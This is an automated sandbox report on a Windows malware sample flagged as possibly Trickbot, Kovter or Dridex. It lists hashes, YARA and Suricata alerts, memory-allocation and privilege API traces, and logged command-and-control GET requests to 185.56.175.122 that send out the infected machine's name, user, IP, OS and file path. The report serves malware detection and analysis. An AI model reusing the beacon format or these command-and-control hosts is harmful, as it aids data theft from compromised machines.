Summary | ZeroBOX


Tags: Malicious Library, OS Processor Check, PE32, PE File

Category: FILE
Machine: s1_win7_x6402
Started: Sept. 10, 2021, 5:17 p.m.
Completed: Sept. 10, 2021, 5:19 p.m.
Size 1.8MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 40932e7f31ad53c47c03592a1de47151
SHA256 1afbb671cb511d867e5def880d34883ec05470d934d06bbb0ea074a98f196e5d
CRC32 525B8A26
ssdeep 49152:SVB3Xujk16sb2FX6CzYQsWGAMA3YbGMctIBR:SzXuQ16sb2FX6RnWGJAyGMca
PDB Path c:\startProper\carSell\Miletemperature\WereMajortime.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)

DNS (Name -> Response, Post-Analysis Lookup)
wtfismyip.com -> 51.79.249.161

IP Address       Status   Action
105.27.205.34    Active   Moloch
164.124.101.2    Active   Moloch
185.56.175.122   Active   Moloch
46.99.175.149    Active   Moloch
51.79.249.161    Active   Moloch
65.152.201.203   Active   Moloch

Suricata Alerts

Flow | SID | Signature | Category
TCP 192.168.56.102:49168 -> 185.56.175.122:443 | 2028401 | ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex | Unknown Traffic
TCP 192.168.56.102:49169 -> 51.79.249.161:80 | 2019737 | ET POLICY IP Check wtfismyip.com | Potential Corporate Privacy Violation
TCP 185.56.175.122:443 -> 192.168.56.102:49168 | 2011540 | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) | Not Suspicious Traffic
TCP 192.168.56.102:49169 -> 51.79.249.161:80 | 2013028 | ET POLICY curl User-Agent Outbound | Attempted Information Leak

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.102:49168 -> 185.56.175.122:443 | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | 50:fd:fd:4e:2c:57:ea:f7:c9:cd:3f:61:4a:a2:40:01:1b:b8:df:02

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
pdb_path c:\startProper\carSell\Miletemperature\WereMajortime.pdb
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
hook_in_monitor+0x45 lde-0x133 @ 0x74e642ea
New_ntdll_LdrGetProcedureAddress+0x43 New_ntdll_LdrLoadDll-0x156 @ 0x74e7f7f3
GetProcAddress+0x60 GetModuleHandleA-0x80 kernelbase+0x4190 @ 0x7fefde34190
SvchostPushServiceGlobals+0x471 WinHttpQueryOption-0x1a7b winhttp+0x1eb99 @ 0x7fef89aeb99
SvchostPushServiceGlobals+0x4fb WinHttpQueryOption-0x19f1 winhttp+0x1ec23 @ 0x7fef89aec23
WinHttpConnect+0x1ab WinHttpGetDefaultProxyConfiguration-0x1615 winhttp+0x13fe7 @ 0x7fef89a3fe7

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x77919a5a
registers.r14: 1998727936
registers.r15: 5594578
registers.rcx: 0
registers.rsi: 852308560
registers.r10: 0
registers.rbx: 0
registers.rsp: 714848
registers.r11: 0
registers.r8: 5
registers.r9: 1961940992
registers.rdx: 2
registers.r12: 3001376
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 443
1 0 0
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/5/file/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/3r3r57PfZRZnF5NBVnVbZZp15X9911N/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/user/test22/0/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesYX5S%5Creadytunes.exe/0/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/NAT%20status/client%20is%20behind%20NAT/0/
request GET http://wtfismyip.com/text
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/5/file/
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/3r3r57PfZRZnF5NBVnVbZZp15X9911N/
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/user/test22/0/
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesYX5S%5Creadytunes.exe/0/
request GET https://185.56.175.122/rob130/TEST22-PC_W617601.F23B783DDF38DBB86097125BBF17EB14/14/NAT%20status/client%20is%20behind%20NAT/0/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 16384
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005b3000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00790000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02600000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 245760
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00401000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10000000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10001000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02600000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02610000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 176128
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02620000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2452
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000490000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
domain wtfismyip.com
cmdline C:\Windows\system32\cmd.exe
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
section .text: virtual_address 0x00001000, virtual_size 0x00104381, size_of_data 0x00104400, entropy 6.87153951036 - description: A section with a high entropy has been found
section .data: virtual_address 0x0018f000, virtual_size 0x0011006c, size_of_data 0x00020c00, entropy 6.88054646533 - description: A section with a high entropy has been found
entropy 0.637996733805 - description: Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000000
process_identifier: 1776
process_handle: 0x000000f4
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 1776
process_handle: 0x000000f4
1 0 0
host 105.27.205.34
host 185.56.175.122
host 46.99.175.149
host 65.152.201.203
dead_host 46.99.175.149:443
dead_host 65.152.201.203:443